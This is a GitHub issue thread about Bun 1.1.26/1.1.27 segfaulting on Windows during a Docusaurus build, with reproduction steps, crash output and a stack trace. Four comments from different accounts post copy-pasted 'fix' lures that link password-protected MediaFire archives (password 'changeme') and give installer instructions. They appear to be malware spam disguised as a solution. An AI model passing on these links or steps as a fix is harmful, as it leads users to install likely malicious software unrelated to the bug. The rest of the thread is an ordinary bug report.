### ISSUE TITLE
1.1.27 `bun --bun run docusaurus build --no-minify` segfaults

### ISSUE THREAD

**Issue by o-l-a-v** [oven-sh/bun#13584]
### How can we reproduce the crash?

Windows 11 23H2, Bun v1.1.26, PowerShell v7.4.5 `-noprofile`, Docusaurus 3.5.2.

Reproduce:

* `cd "$env:USERPROFILE\Desktop"`
* `mkdir tes`
* `cd tes`
* `bun create docusaurus@latest`, choose classic as template, and JavaScript (vs. TypeScript), rest as default.
* `cd website`
* `bun install`
* `bun --bun run docusaurus build --no-minify`

Bun crashes and removes content in the terminal, so had to take a screen recording instead. Screenshot of the screen recording:

<img width="1273" alt="image" src="https://github.com/user-attachments/assets/aca70737-5702-449d-a528-f52e5edf9f8b">

Using the image to text functionality in Windows snipping tool:

```
Bun v1.1.26 (0a37423b) Windows x64
Windows v.win10_fe
CPU: sse42 avx avx2
Args: "node" "C:\Users\olav.birkeland\Desktop\tesrspress\website\node_modules@docusaurus\core\bin\docusaurus.mjs" "build" " -- no-minify"
Features: jsc Bun. stderr Bun. stdin(2) transpiler_cache(36) tsconfig(175)
Builtins: "bun:jsc" "bun:main" "node: assert" "node: async_hooks" "node: buffer" "node: child_process" "node: constants" "node:crypto" "node:dns" "node: events" "node:fs" "node:fs/promise
et" "node: os" "node : path" "node: perf_hooks" "node : process" "node: querystring" "node : readline" "node: stream" "node : string_decoder" "node: tls" "node:tty" "node:url" "node: util" "node:
reads" "node: punycode" "ws" "node: v8" "node: http2"
Elapsed: 13277ms | User: 6375ms | Sys: 1296ms
RSS: 1.60GB | Peak: 1.61GB | Commit: 19.26GB | Faults: 445756

panic(main thread): Segmentation fault at address 0x13FFFFFFC
oh no: Bun has crashed. This indicates a bug in Bun, not your code.

To send a redacted crash report to Bun's team,
please file a GitHub issue using the link below:

https://bun.report/1.1.26/wn10a37423AugggwC8m7g6C_A2C4/////B
```

### Stack Trace (bun.report)

Bun v1.1.26 ([`0a37423`](<https://github.com/oven-sh/bun/tree/0a37423bafab6aebe803e5f1594cffa9796f2ae6>)) on windows x86_64 [RunAsNodeCommand]

Segmentation fault at address 0x13FFFFFFC

- [`LazyProperty.h:97`](<https://github.com/oven-sh/bun/blob/0a37423bafab6aebe803e5f1594cffa9796f2ae6/C:/buildkite-agent/builds/windows-x64-hetzner-6/bun/bun/build/bun-webkit/include/JavaScriptCore/LazyProperty.h#L97>): `JSC::LazyProperty<JSC::JSGlobalObject,JSC::Structure>::getInitializedOnMainThread`

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SunsetTechuila** [comment]
somehow cannot be reproduced on debug builds
![image](https://github.com/user-attachments/assets/4554d21d-57ce-4714-8bd9-1e7c8e3d6d8d)

**Comment by o-l-a-v** [comment]
Happens with v1.27.0 too.

https://github.com/user-attachments/assets/16a67983-1a73-4cb8-85ef-cbb33c2218e4
